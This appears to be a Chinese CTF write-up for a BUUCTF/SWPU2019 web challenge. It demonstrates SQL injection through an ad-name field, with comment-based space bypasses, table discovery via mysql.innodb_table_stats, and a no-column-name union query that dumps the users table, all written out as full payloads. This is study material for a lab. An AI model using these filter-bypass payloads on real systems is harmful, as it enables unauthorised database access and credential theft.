打开页面,原本以为是二次注入,结果不是,先注册一个账户
在申请发布广告中,发现反射性xss(然而没有什么用)
在广告申请名字中发现注入点
开始注入
通过一系列的测试,发现系统过滤了#,or,空格
order by不能使用,只能用union select来判断显示位
空格可以使用/**/绕过
-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
因为or被过滤,information_schema不能使用
也可以通过mysql.innodb_table_stats,来获取表名
-1'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
表名知道了,但是列名怎么求?
这里我们使用无列名注入
1'/**/union/**/select/**/1,2,(select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/union/**/select*from/**/users)s),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
(select group_concat(a) from (select 1,2 as a,3 union select*from users)s)
(select 1,2 as a,3 union select * from users)s
//意思是:查询user表中前三列的数据,并且把第三列重命名位a(我们不知道第三列的名字是什么),然后重命名为s.
(select group_concat(a) from s)
//意思是:查询s中a的值,也就是重命名后的第3列
-1'/**/union/**/select/**/1,2,(select/**/group_concat(a,'~',b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)s),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
![<span style='color:red;'>BUUCTF</span>——[<span style='color:red;'>SWPU</span><span style='color:red;'>2019</span>]ReverseMe](https://img-blog.csdnimg.cn/direct/f03c9af732ff43639fac29ac78505605.png)
![[<span style='color:red;'>SWPU</span><span style='color:red;'>2019</span>]<span style='color:red;'>Web</span>4](https://img-blog.csdnimg.cn/img_convert/24bf6468f3e5c8edf04371d00a33be69.png)
![<span style='color:red;'>BUUCTF</span>---misc---[<span style='color:red;'>SWPU</span><span style='color:red;'>2019</span>]我有一只马里奥](https://img-blog.csdnimg.cn/direct/360add6f3ce542138ce29923e6cdda69.png)
![<span style='color:red;'>BUUCTF</span>---<span style='color:red;'>web</span>---[SUCTF <span style='color:red;'>2019</span>]CheckIn](https://img-blog.csdnimg.cn/direct/30d3b31d920e4182a16c3bbda6562c24.png)
![[<span style='color:red;'>BUUCTF</span>]ciscn_<span style='color:red;'>2019</span>_c_<span style='color:red;'>1</span>](https://img-blog.csdnimg.cn/direct/7c3e8fdff31648b0b7a4fcb7d96a8924.png)
![ciscn_<span style='color:red;'>2019</span>_c_<span style='color:red;'>1</span>[<span style='color:red;'>BUUCTF</span>]](https://img-blog.csdnimg.cn/direct/bc09555500f84a0f8c77ecd1ddf564f6.png)
![[<span style='color:red;'>SWPU</span><span style='color:red;'>2019</span>]<span style='color:red;'>Web</span>3 ----不会编程的崽](https://img-blog.csdnimg.cn/direct/80c3fd0618d84de189b28ee9d8e9ef8f.png)
![<span style='color:red;'>BUUCTF</span> misc 专题(47)[<span style='color:red;'>SWPU</span><span style='color:red;'>2019</span>]神奇的二维码](https://img-blog.csdnimg.cn/ea38b9f3d84d4e7184ee84274cd5de81.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAdHRfbnBj,size_20,color_FFFFFF,t_70,g_se,x_16)
